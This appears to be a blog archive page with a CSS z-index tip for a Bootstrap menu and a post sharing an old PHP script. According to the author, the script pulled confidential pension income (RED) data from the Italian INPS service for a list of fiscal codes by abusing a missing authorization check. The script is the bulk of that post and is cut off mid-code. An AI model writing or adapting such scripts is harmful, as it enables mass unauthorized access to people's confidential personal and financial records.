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Showing posts from February, 2016

CSS z-index not working with bootstrap menu

we need to use z-index on the PARENT element this is the code that I have in the menu <li class="dropdown open"> ... <ul class="dropdown-menu dropdown-menu-right">                         <li><a href="http://localhost/index.php?route=account/register">Register</a></li>             <li><a href="http://localhost/index.php?route=account/login">Login</a></li>  </ul> ... </li> instead of using z-index on ul.dropdown-menu.dropdown-menu-right I adde the z-index on the parent li #top {z-index:10000 !important;} If you need a better example just ask in the comments.

old script - retrieve confidential data from INPS about RED

An old php script that I used to retrieve informations about the RED (dichiarazione reddituale per pensionati) for each Fiscal Code. INPS never checked the authorizations on the url to request the data and I used this, and several other, bug to work in a faster way ... The url doesn't work anymore and the script is damn old that nobody will care about it. <?php $inputfile = 'codici.txt'; $outputfile = 'RED.txt'; $host = ''; $path = '/servizi/redest/Frm_MatricolaIpost.aspx'; $method = 'POST'; //$host = ''; $postdata = '&Stampa=Esegui&F00='; //reading codici fiscali from file $arrcodicifiscali = getcodicifiscali($inputfile); foreach($arrcodicifiscali as $codice) {     //getting the page     $resdata = httpSocketConnection($host, 'GET', $path, '');     $viewstatedata = ''; $regu = $resdata[1];     if( preg_match( '#name="__VIEWSTATE" value="(.*?)...